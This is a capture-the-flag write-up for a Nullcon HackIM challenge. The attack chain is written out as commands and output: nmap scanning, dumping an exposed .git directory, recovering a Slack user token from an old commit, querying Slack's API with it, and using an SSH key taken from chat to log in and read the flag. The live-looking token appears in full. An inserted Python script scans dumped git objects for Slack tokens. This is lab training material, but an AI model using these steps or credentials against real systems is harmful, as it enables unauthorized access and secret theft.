Hackim Nullcon CTF – OSINT4


ID-10-T Team

In this challenge we are given an IP address and have to exploit a configuration flaw to return control to the legitimate owners. The first step is to scan the ports of that IP address:

nmap -sS 54.85.105.103

Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-11 13:08 EST
Nmap scan report for ec2-54-85-105-103.compute-1.amazonaws.com (54.85.105.103)
Host is up (0.18s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds

We then browse to the HTTP service on port 80.

The next step is content discovery, for example with Burp Intruder:

The web root exposes a .git directory. Let's dump it and extract the files with GitTools:

Dump:

$ ./gitdumper.sh http://54.85.105.103/.git/ dump/
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances. 
# Only for educational purposes!
###########


[*] Destination folder does not exist
[+] Creating dump//.git/
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[-] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[+] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[+] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[+] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[+] Downloaded: objects/ac/fc9dc1aeb220fc298129e361657dcf29f9ca73
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/7c/3b9ebe9efb7c7a107dd50cfcea5a45294a5e21
[+] Downloaded: objects/e7/62de10c5cc16a55ab62ce2e86ea7cedee37119
[+] Downloaded: objects/69/070f481086429a5171eee0db344c6e5f763180
[+] Downloaded: objects/f4/dbd1e4160988fc21955029e43a07c29e647461
[+] Downloaded: objects/0d/63125df015d371b7cbddc3ab41afa517784ca0
[+] Downloaded: objects/08/c42890845313fe6ce1cba1d8724d894a616c58
[+] Downloaded: objects/0f/250d442daaaf05714ddb312d39df823f0abef7
[+] Downloaded: objects/2b/5c11fb5d58e3e2834fca06ac41b997aaceb3c1
[+] Downloaded: objects/14/552d0244d9d36bd862bd3af58b9424d05a145a

Extract:

$ ./extractor.sh ../Dumper/dump/ dump_extract/
###########
# Extractor is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances. 
# Only for educational purposes!
###########
[*] Destination folder does not exist
[*] Creating...
[+] Found commit: 2b5c11fb5d58e3e2834fca06ac41b997aaceb3c1
[+] Found file: /GitTools/Extractor/dump_extract/0-2b5c11fb5d58e3e2834fca06ac41b997aaceb3c1/README.md
[+] Found commit: 0d63125df015d371b7cbddc3ab41afa517784ca0
[+] Found file: /GitTools/Extractor/dump_extract/1-0d63125df015d371b7cbddc3ab41afa517784ca0/README.md
[+] Found file: /GitTools/Extractor/dump_extract/1-0d63125df015d371b7cbddc3ab41afa517784ca0/Slack Config
[+] Found commit: e762de10c5cc16a55ab62ce2e86ea7cedee37119
[+] Found file: /GitTools/Extractor/dump_extract/2-e762de10c5cc16a55ab62ce2e86ea7cedee37119/README.md
[+] Found file: /GitTools/Extractor/dump_extract/2-e762de10c5cc16a55ab62ce2e86ea7cedee37119/Slack Config
[+] Found commit: acfc9dc1aeb220fc298129e361657dcf29f9ca73
[+] Found file: /GitTools/Extractor/dump_extract/3-acfc9dc1aeb220fc298129e361657dcf29f9ca73/README.md

Let's look at the «Slack Config» file, which only exists in the older commits and was removed from the latest one:

$ cat "/GitTools/Extractor/dump_extract/1-0d63125df015d371b7cbddc3ab41afa517784ca0/Slack Config"
Organisation Slack
https://corpnull.slack.com

Slack Token: xoxp-302709175073-304111796230-302748987361-6d10dcd6f4cedc60900986def747f0e5
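GitTools recovers files by inflating git's loose objects (.git/objects/aa/bbbb...) and following commits, then leaves it to the reader to spot secrets in each commit directory. As an added example (not code from the original writeup or from GitTools), the Python script below parses loose objects directly, verifies each one (header, declared size and sha1, since a dump usually contains truncated or 404-page objects), and scans every blob for Slack-style tokens. Scanning blobs rather than checked-out commits means a token that was committed and later deleted, as the «Slack Config» file above was, is still flagged. The fixture the demo builds is constructed for this example and the token in it is fake; the token regex covers the prefixes Slack documents (xoxp, xoxb, xoxa, xoxr).

```python
import hashlib
import os
import re
import tempfile
import zlib

# Token prefixes documented by Slack: xoxp (user), xoxb (bot), xoxa (app), xoxr (refresh).
SLACK_TOKEN_RE = re.compile(r"xox[abpr]-[0-9]+-[0-9A-Za-z-]+")


def git_hash_object(obj_type, data):
    """Return (sha1, zlib stream) for a loose object, as `git hash-object -w` stores it.

    Git hashes the header "<type> <size>\\0" followed by the raw content, then
    zlib-compresses that same byte string into .git/objects/<aa>/<bbbb...>.
    """
    store = obj_type.encode() + b" " + str(len(data)).encode() + b"\x00" + data
    return hashlib.sha1(store).hexdigest(), zlib.compress(store)


def write_loose_object(git_dir, obj_type, data):
    """Write a loose object under git_dir/objects and return its sha1 (used to build the fixture)."""
    sha, compressed = git_hash_object(obj_type, data)
    obj_dir = os.path.join(git_dir, "objects", sha[:2])
    os.makedirs(obj_dir, exist_ok=True)
    with open(os.path.join(obj_dir, sha[2:]), "wb") as fh:
        fh.write(compressed)
    return sha


def read_loose_object(git_dir, sha):
    """Inflate and verify one loose object; returns (type, content).

    Dumps from a web server often contain partial or bogus objects, so the header,
    the declared size and the sha1 are all checked before the body is trusted.
    """
    with open(os.path.join(git_dir, "objects", sha[:2], sha[2:]), "rb") as fh:
        store = zlib.decompress(fh.read())
    header, sep, body = store.partition(b"\x00")
    if not sep:
        raise ValueError("missing object header")
    obj_type, size = header.decode("ascii").split(" ")
    if int(size) != len(body) or hashlib.sha1(store).hexdigest() != sha:
        raise ValueError("corrupt object %s" % sha)
    return obj_type, body


def scan_dump_for_tokens(git_dir):
    """Walk every loose object in a dumped .git and return {blob_sha: [tokens]}."""
    hits = {}
    objects_dir = os.path.join(git_dir, "objects")
    for prefix in sorted(os.listdir(objects_dir)):
        if len(prefix) != 2:          # skip objects/info and objects/pack
            continue
        for rest in os.listdir(os.path.join(objects_dir, prefix)):
            sha = prefix + rest
            try:
                obj_type, body = read_loose_object(git_dir, sha)
            except (ValueError, zlib.error, OSError):
                continue              # partial download or junk; ignore it
            if obj_type != "blob":
                continue
            found = SLACK_TOKEN_RE.findall(body.decode("utf-8", "replace"))
            if found:
                hits[sha] = found
    return hits


def demo():
    """Build a constructed .git with one secret blob, one clean blob and one commit, then scan it."""
    git_dir = tempfile.mkdtemp(prefix="gitdump-")
    # Constructed fixture modelled on the recovered "Slack Config" file; the token is fake.
    slack_config = (
        b"Organisation Slack\nhttps://example.slack.com\n\n"
        b"Slack Token: xoxp-000000000000-000000000000-000000000000-0123456789abcdef0123456789abcdef\n"
    )
    write_loose_object(git_dir, "blob", slack_config)
    write_loose_object(git_dir, "blob", b"# README\nNothing to see here.\n")
    write_loose_object(git_dir, "commit", b"tree 0000000000000000000000000000000000000000\n\ncommit message\n")
    return scan_dump_for_tokens(git_dir)


if __name__ == "__main__":
    for sha, tokens in demo().items():
        print(sha, tokens)
```

To run it against a real dump, call scan_dump_for_tokens("dump/.git"); packed objects (objects/pack/*.pack) are not handled here, which is also why gitdumper tries objects/info/packs first.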

We have a Slack user token (the xoxp- prefix means it acts with the full permissions of the user it belongs to), so let's play with the Slack API. First, list the channels:

$ curl -H 'Authorization: Bearer xoxp-302709175073-304111796230-302748987361-6d10dcd6f4cedc60900986def747f0e5' -H 'Content-type: application/x-www-form-urlencoded' https://slack.com/api/channels.list

The most interesting channel is «C8Y41NDEJ».

Next, we pull the message history of that channel with the channels.history method (Slack has since replaced it with conversations.history). The token only needs to be sent once, in the Authorization header:

$ curl -H 'Authorization: Bearer xoxp-302709175073-304111796230-302748987361-6d10dcd6f4cedc60900986def747f0e5' "https://slack.com/api/channels.history?channel=C8Y41NDEJ"

In the Slack chat we find an RSA private key and the username that goes with it, which we use to log in to the SSH server:

$ ssh mikeatcorp@54.85.105.103
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-1047-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Get cloud support with Ubuntu Advantage Cloud Guest:
 http://www.ubuntu.com/business/services/cloud

24 packages can be updated.
0 updates are security updates.


*** System restart required ***
Last login: Sun Feb 11 11:16:33 2018 from

mikeatcorp@ip-172-30-1-179:~$ locate flag.txt
/secret/.supersecret/flag.txt
mikeatcorp@ip-172-30-1-179:~$ cat /secret/.supersecret/flag.txt
hackim18{'455676878965435365788698546'}
mikeatcorp@ip-172-30-1-179:~$

Flag: hackim18{'455676878965435365788698546'}

Thanks to DanitorwS for helping to solve some problems with this challenge.

Cheers.